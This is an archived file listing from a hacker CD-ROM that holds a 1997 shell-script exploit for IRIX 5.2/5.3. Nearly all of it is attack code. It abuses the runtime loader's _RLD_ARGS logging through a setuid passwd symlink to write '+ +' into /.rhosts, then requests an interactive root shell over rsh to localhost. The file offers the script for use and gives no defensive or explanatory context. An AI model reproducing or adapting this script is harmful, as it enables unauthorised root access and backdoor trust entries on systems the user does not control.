home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / irix / irx_rld.txt < prev    next >
Encoding:
Text File  |  2002-10-22  |  521 b   |  26 lines

  1. #!/bin/sh
  2. ## copyright LAST STAGE OF DELIRIUM jul 1997 poland            *://lsd-pl.net/ #
  3. ## runtime loader                                                              #
  4.  
  5. echo "copyright LAST STAGE OF DELIRIUM jul 1997 poland  //lsd-pl.net/"
  6. echo "runtime loader for irix 5.2 5.3 IP:all\n"
  7.  
  8. SYMLINK="
  9. + +
  10. "
  11.  
  12. ln -s /bin/passwd "$SYMLINK"
  13. _RLD_ARGS="-log /.rhosts -pixie -no_pixie_init"
  14. export _RLD_ARGS
  15.  
  16. "$SYMLINK"
  17.  
  18. _RLD_ARGS=""
  19. export _RLD_ARGS
  20. rm -f "$SYMLINK"
  21.  
  22. rsh -l root localhost sh -i
  23.  
  24.  
  25.  
  26.